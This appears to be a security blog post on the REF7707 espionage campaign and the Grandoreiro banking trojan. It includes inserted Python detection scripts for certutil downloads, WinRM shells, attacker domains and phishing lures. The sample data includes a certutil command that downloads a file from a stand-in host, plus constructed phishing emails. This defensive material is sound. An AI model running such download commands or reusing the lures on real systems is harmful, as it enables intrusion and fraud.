Hackers Target South America and Southeast Asia

A group of hackers has been caught running a large-scale cyber spying operation, now called REF7707. The attack was first noticed in November 2024 when strange activity was detected in the Foreign Ministry of a South American country. As experts looked deeper, they found that the same hackers had also targeted several other organizations in Southeast Asia.  

The attackers used advanced hacking tools to break into computer systems, steal information, and stay hidden for a long time. However, even though they were highly skilled, they made serious mistakes that exposed their operation.  


The Malicious Software Used in the Attack  

The hackers used three main types of malware (harmful programs) to infect computers and control them remotely:  

FINALDRAFT: A Hidden Control System 

One of the key tools in this attack was FINALDRAFT, a type of software that allowed hackers to secretly take control of a computer. Once installed, they could:  

  • Run commands: Hackers could make the infected computer perform actions, like downloading more malware or collecting sensitive files.  
  • Hide in normal programs: They inserted their malicious code into everyday programs like MS Paint, making it harder for security software to detect.  
  • Use Microsoft’s online services: The hackers used Microsoft Graph API, a service that businesses commonly use, to blend their malicious activities with normal traffic.  


GUIDLOADER and PATHLOADER: Sneaky Installers

These two programs acted as delivery tools that installed FINALDRAFT on infected computers. Instead of storing dangerous files on a computer’s hard drive (where antivirus software could scan them), they loaded the malware directly into the computer’s memory. Because many antivirus scans only examine files on disk, this method helps cybercriminals keep the malware unnoticed.  

To further cover their tracks, they hid malware downloads on popular websites, including:  

1. Google Firebase (a cloud service used by developers)  

2. Pastebin (a site often used to store and share text)  

3. Web storage systems of Southeast Asian universities  

By using trusted websites, they made it harder for security systems to recognize the attack.  


Hackers Misused Windows Tools to Spread  

Instead of only relying on their own hacking tools, the attackers took advantage of built-in Windows programs to spread across networks:  

  • Certutil.exe: A program designed to manage security certificates, but in this case, hackers misused it to download and install their malware.  
  • Windows Remote Management (WinRM): A legitimate Windows tool that lets administrators run commands on other computers. WinRM only accepts valid logins, so the hackers’ ability to use it to jump from one system to another means they were likely using passwords stolen in earlier attacks.  

By using tools that were already part of Windows, they avoided setting off alarms that custom-made malware might trigger.  
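Both of the Windows tools named above are ordinary administrative programs, so spotting their misuse comes down to context: which process launched them and with what arguments. The Python script below is an added example, not code from the post or from the researchers who analysed REF7707. It runs two detection rules over constructed process-creation records: a certutil.exe launch whose command line fetches a URL, and a shell started by wsmprovhost.exe, the process that hosts commands received over WinRM. The record format and the sample events are assumptions made for the example.

```python
from pathlib import PureWindowsPath

# Constructed process-creation events (not telemetry from the REF7707 case).
# Format assumed for the example: "parent image|child image|child command line".
SAMPLE_EVENTS = [
    r"explorer.exe|C:\Windows\System32\cmd.exe|cmd.exe /c dir",
    r"cmd.exe|C:\Windows\System32\certutil.exe|certutil.exe -urlcache -split -f http://example.invalid/update.txt C:\Users\Public\update.txt",
    r"wsmprovhost.exe|C:\Windows\System32\cmd.exe|cmd.exe /c whoami",
    r"svchost.exe|C:\Windows\System32\certutil.exe|certutil.exe -verify C:\certs\corp.cer",
    r"wsmprovhost.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe -NoProfile -Command Get-Process",
]

WINRM_HOST = "wsmprovhost.exe"  # hosts commands that arrive over WinRM
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows path, e.g. 'C:\\x\\certutil.exe' -> 'certutil.exe'."""
    return PureWindowsPath(path).name.lower()


def certutil_download(parent: str, image: str, cmdline: str) -> bool:
    """certutil.exe told to fetch a URL into its cache: the certificate tool used as a downloader.
    Ordinary certificate work (e.g. '-verify' on a local file) does not match."""
    if _basename(image) != "certutil.exe":
        return False
    cl = cmdline.lower()
    return ("-urlcache" in cl or "/urlcache" in cl) and ("http://" in cl or "https://" in cl)


def winrm_remote_shell(parent: str, image: str, cmdline: str) -> bool:
    """A command shell whose parent is the WinRM host process: a command run from another machine."""
    return _basename(parent) == WINRM_HOST and _basename(image) in SHELLS


RULES = {
    "certutil_download": certutil_download,
    "winrm_remote_shell": winrm_remote_shell,
}


def parse_event(line: str):
    """Split one record into (parent, image, cmdline); the command line may itself contain '|'."""
    parent, image, cmdline = line.split("|", 2)
    return parent, image, cmdline


def detect(events):
    """Return (1-based event index, rule name, command line) for every rule that fires."""
    hits = []
    for index, line in enumerate(events, 1):
        line = line.strip()
        if not line:
            continue
        event = parse_event(line)
        for name, rule in RULES.items():
            if rule(*event):
                hits.append((index, name, event[2]))
    return hits


if __name__ == "__main__":
    for index, name, cmdline in detect(SAMPLE_EVENTS):
        print(f"event {index}: {name}: {cmdline}")
```

In a real deployment the same two rules would read process-creation telemetry (for example Sysmon event ID 1 or an EDR feed) instead of a list of strings. Neither rule fires on certutil.exe verifying a local certificate or on a shell started by a local user, which is what keeps the alert volume manageable.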


How the Hackers Were Caught  

Even though REF7707 was a well-planned attack, the hackers made several big mistakes that helped cybersecurity experts uncover their activities.  

Key Errors They Made:

1. Left behind test versions of their malware: Some samples contained error messages and incomplete code, revealing how they built their attack.  

2. Exposed their own websites: Many of their fake websites remained open and accessible, allowing experts to track their movements.  

3. Messed up their encryption: Some malware was poorly coded, which made it easier for researchers to analyze and understand how it worked.  


Tracing the Hackers’ Footsteps  

By following these mistakes, security researchers tracked the hackers’ network of fake websites and compromised services. Some of the suspicious domains they discovered included:  

1. digert.ictnsc[.]com

2. support.vmphere[.]com  

3. hobiter[.]com and vm-clouds[.]net, which shared the same setup, suggesting they were controlled by the same group.  

The attackers also abused Microsoft’s services to make their hacking traffic look like normal company activity.  
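The domains above are written "defanged" (with "[.]" in place of ".") so they cannot be clicked by accident. To use them defensively they have to be normalised and compared against DNS or proxy logs, including any subdomain of a listed name. The Python below is an added example, not code from the post; only the four domain names come from the post, while the DNS log format and the log lines are constructed for the example.

```python
# Defanged indicators exactly as published in the post.
DEFANGED_DOMAINS = [
    "digert.ictnsc[.]com",
    "support.vmphere[.]com",
    "hobiter[.]com",
    "vm-clouds[.]net",
]

# Constructed DNS query log (assumed format: timestamp, client IP, record type, queried name).
SAMPLE_DNS_LOG = """\
2025-02-10T10:01:02Z 10.0.0.5 A www.example.com.
2025-02-10T10:01:05Z 10.0.0.5 A SUPPORT.VMPHERE.COM.
2025-02-10T10:01:09Z 10.0.0.7 AAAA cdn.hobiter.com
2025-02-10T10:01:11Z 10.0.0.7 A notvm-clouds.net
2025-02-10T10:01:15Z 10.0.0.9 A digert.ictnsc.com
"""


def refang(indicator: str) -> str:
    """Turn a defanged name back into a comparable hostname: lower case,
    '[.]', '(.)' and '{.}' become '.', and a trailing dot is removed."""
    name = indicator.strip().lower()
    for token in ("[.]", "(.)", "{.}"):
        name = name.replace(token, ".")
    return name.rstrip(".")


def normalize_qname(qname: str) -> str:
    """Queried names arrive in mixed case and sometimes as FQDNs with a trailing dot."""
    return qname.strip().lower().rstrip(".")


def matches(qname: str, indicator: str) -> bool:
    """True when qname is the indicator itself or a subdomain of it.
    A plain suffix is not enough: 'notvm-clouds.net' must not match 'vm-clouds.net'."""
    return qname == indicator or qname.endswith("." + indicator)


def match_dns_log(log_text: str, defanged=DEFANGED_DOMAINS):
    """Return (timestamp, client, queried name, matched indicator) for each hit."""
    indicators = [refang(d) for d in defanged]
    hits = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) < 4:
            continue  # malformed or empty line
        timestamp, client, _rtype, qname = parts[:4]
        q = normalize_qname(qname)
        for indicator in indicators:
            if matches(q, indicator):
                hits.append((timestamp, client, q, indicator))
                break
    return hits


if __name__ == "__main__":
    for timestamp, client, q, indicator in match_dns_log(SAMPLE_DNS_LOG):
        print(f"{timestamp} {client} queried {q} (matches {indicator})")
```

The subdomain rule matters because infrastructure of this kind is usually reached through host names under the registered domain; the exact-or-subdomain check catches those without producing false hits on unrelated names that merely end with the same characters.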


What We Can Learn from This Attack

REF7707 is a clear example of how cybercriminals use sophisticated tricks to break into important systems, stay hidden, and steal data. But it also proves that even expert hackers can make mistakes, and when they do, security teams can use those errors to track them down.  

Hackers are constantly improving their tactics, but as this case shows, cybersecurity experts are also getting better at catching them.  


Global Resurgence of Grandoreiro Banking Trojan Hitting High

The cybercriminal group behind the Grandoreiro banking trojan has re-emerged in a global campaign since March 2024, following a significant law enforcement takedown earlier this year. This large-scale phishing operation targets over 1,500 banks across more than 60 countries, spanning Central and South America, Africa, Europe, and the Indo-Pacific, according to IBM X-Force. Originally focused on Latin America, Spain, and Portugal, Grandoreiro’s new campaign signifies a strategic shift after Brazilian authorities disrupted its infrastructure. 

Despite a major takedown in January 2024, which saw the Brazilian Federal Police, Interpol, the Spanish National Police, ESET, and Caixa Bank dismantle the operation and arrest five individuals, the malware has returned with significant upgrades. The phishing emails associated with Grandoreiro masquerade as urgent government payment requests, prompting recipients to click on links that download and execute malicious files. 

Once installed, the trojan interacts with banking apps to facilitate fraudulent transactions, logs keystrokes and captures screenshots to steal banking credentials and sensitive data. It also allows remote system manipulation and file operations by threat actors. A key enhancement in the latest version is a module that captures Microsoft Outlook data and uses compromised email accounts to spread spam. 

Grandoreiro employs the Outlook Security Manager tool to bypass security alerts, enabling seamless interaction with the Outlook client. IBM X-Force reports substantial improvements to the malware’s evasion techniques, including a string decryption method using AES CBC encryption with a unique decoder. The domain generation algorithm (DGA) has been upgraded with multiple seeds to enhance command and control (C2) communications. 

The trojan can also disable security alerts in Outlook and send phishing emails using compromised credentials. The updated Grandoreiro evades execution in several countries, including Poland, the Czech Republic, the Netherlands, and Russia. It also blocks operation on Windows 7 systems in the US without an active antivirus program, demonstrating its resilience and increased persistence. 

To Combat the Threat of Grandoreiro

Organizations are advised to prioritize user education on phishing tactics. Employees should be trained to recognize suspicious emails, verify sender legitimacy, and avoid clicking on unknown links or opening untrusted attachments. Robust spam filtering systems at the gateway level can intercept many phishing emails, while behavior-based detection techniques in endpoint security systems can identify and stop harmful activities. As phishing attacks rise, protecting organizations becomes crucial. 
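Gateway filtering of the kind recommended above works by scoring messages on concrete signals rather than on judgement alone. The Python below is an added example, not code from the post or from any vendor it names. It applies three such signals to a constructed message: an urgency phrase in the subject, a link whose visible text shows a different host than its real target, and a link that points at a downloadable archive or executable, which is the lure pattern the post describes (an urgent payment notice leading to a malicious file). The sample messages, the word list and the extension list are assumptions made for the example.

```python
from email import message_from_string
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed phishing-style message (not a real Grandoreiro lure); .invalid is a reserved TLD.
SAMPLE_PHISH = """\
From: "Federal Tax Office" <notice@tax-refund-alerts.invalid>
To: finance@corp.invalid
Subject: URGENT: overdue government payment - action required today
Content-Type: text/html; charset=utf-8

<html><body>
<p>Your payment is overdue. Download the official notice:</p>
<a href="https://files.some-cdn.invalid/notice_2025.zip">https://www.tax.gov.invalid/notice</a>
</body></html>
"""

# Constructed benign message for comparison.
SAMPLE_BENIGN = """\
From: "Alice" <alice@corp.invalid>
To: bob@corp.invalid
Subject: Lunch on Thursday?
Content-Type: text/html; charset=utf-8

<html><body><p>Menu: <a href="https://intranet.corp.invalid/menu">https://intranet.corp.invalid/menu</a></p></body></html>
"""

URGENCY_WORDS = ("urgent", "immediately", "overdue", "action required")
DOWNLOAD_EXTENSIONS = (".exe", ".msi", ".zip", ".rar", ".iso", ".js", ".vbs", ".scr", ".lnk")


class _LinkExtractor(HTMLParser):
    """Collect (href, visible text) for every <a> element in an HTML body."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href")
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def _html_parts(msg):
    """Yield the decoded text of every text/html part (walk() also handles non-multipart)."""
    for part in msg.walk():
        if part.get_content_type() == "text/html":
            payload = part.get_payload(decode=True)
            yield payload.decode(part.get_content_charset() or "utf-8", "replace")


def analyze(raw_message: str) -> list:
    """Return the sorted list of signal names that fire on the message."""
    msg = message_from_string(raw_message)
    findings = set()
    subject = (msg.get("Subject") or "").lower()
    if any(word in subject for word in URGENCY_WORDS):
        findings.add("urgency_subject")
    for html in _html_parts(msg):
        extractor = _LinkExtractor()
        extractor.feed(html)
        for href, text in extractor.links:
            target = urlparse(href)
            # Visible text that looks like a URL but names a different host than the real target.
            if text.lower().startswith(("http://", "https://")):
                shown = urlparse(text)
                if (shown.hostname or "") != (target.hostname or ""):
                    findings.add("link_text_mismatch")
            # Direct link to an archive or executable rather than a web page.
            if target.path.lower().endswith(DOWNLOAD_EXTENSIONS):
                findings.add("download_link")
    return sorted(findings)


if __name__ == "__main__":
    print("phish:", analyze(SAMPLE_PHISH))
    print("benign:", analyze(SAMPLE_BENIGN))
```

Each signal on its own produces false positives (plenty of genuine mail is urgent), so a real gateway combines them into a score and quarantines only above a threshold; the link-text mismatch and the direct download link are the two that most reliably separate a lure from ordinary correspondence.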

Enhancing user awareness is key, and resources like Phishing Tackle offer tools and training to help users recognize and avoid phishing threats. Despite technological defenses, user education remains vital in minimizing the impact of successful attacks. Consulting with experts can provide valuable insights and tools to strengthen defenses against these persistent threats.